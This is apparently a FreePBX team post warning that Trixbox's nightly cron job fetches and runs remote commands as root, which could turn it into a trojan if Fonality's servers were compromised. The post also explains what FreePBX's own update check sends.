Security Concerns with Trixbox

Trixbox is a popular platform that packages our PBX application on top of Asterisk on a CentOS based distribution. There has been some recent news concerning bad security practices and potential privacy issues. In the best interest of all of our installed base, it is our hope that Fonality, the sponsors of Trixbox, will actively contact their installed base to make them aware of this serious security issue which could significantly compromise customer systems if not addressed quickly.

The privacy issues that are being discussed are not the topic of our concern and are between Fonality and their customer base. Our concern is the mechanism that they have used to implement the [i]phone home[/i] solution. You can read details in [i][url=http://www.trixbox.org/forums/trixbox-forums/open-discussion/trixbox-phones-home]this Trixbox thread[/url][/i] as well as other discussions on their forum and elsewhere.

The summary of the issue is they have installed a cron job which contacts the Fonality servers on a nightly basis, downloads a set of commands, executes those commands as root, and then sends data back to the their servers. In the wrong hands, this becomes a [i]trojan horse[/i] and the magnitude of disaster that it could create if their servers were compromised from outside or from disgruntled employees, or from compromised DNS servers (man in the middle) is immense.

In the above thread it is mentioned that FreePBX [i]phone’s home[/i] as well. Instead of splitting hairs over definitions, let me make it perfectly clear what FreePBX does. Most of you are aware of our [i]Online Module Repository[/i] that provides easy updates to new versions of FreePBX and its modules (vs. pulling tarballs manually). When you access our server, we transmit the following information: FreePBX and Asterisk version numbers and a unique identification number that is generated at installation time and can not be traced back to you. We generate this number by taking an md5sum hash of your MAC address. If you are running in a virtual environment such as a VMware or Xensource system we create the hash randomly. (We generate this so we don’t have to use IP addresses which can often be traced back to you, or when dynamic, doesn’t allow accurate information to be kept.) We use this information to properly serve your upgrades as we need to know what version of FreePBX you are running. In addition, we use this information to help us during beta programs. You may recall the [url=/news/2007-08-23/freepbx-2-3-0-and-new-website-simultaneously-released]statistics[/url] that I fed back to you during the FreePBX 2.3 Beta program that helped us gauge the level of beta and Asterisk 1.4 coverage. The Asterisk and FreePBX version statistics also helps us make good development decisions to serve our customer base.
This information is transmitted when you click on [i]Check for Updates Online[/i] or nightly if you have chosen to have updates checked for you. (The nightly checks execute the exact same code as the manual check, there is no difference).
If we ever wanted to obtain more detailed information about your system, it would be an opt-in only basis, the code would be there for you to see and we would never implement something that could pull arbitrary commands from a server just waiting to be compromised.

If there are any questions or concerns with FreePBX, please start the discussion in the Forum or contact me offline.

Philippe – On behalf of the FreePBX Team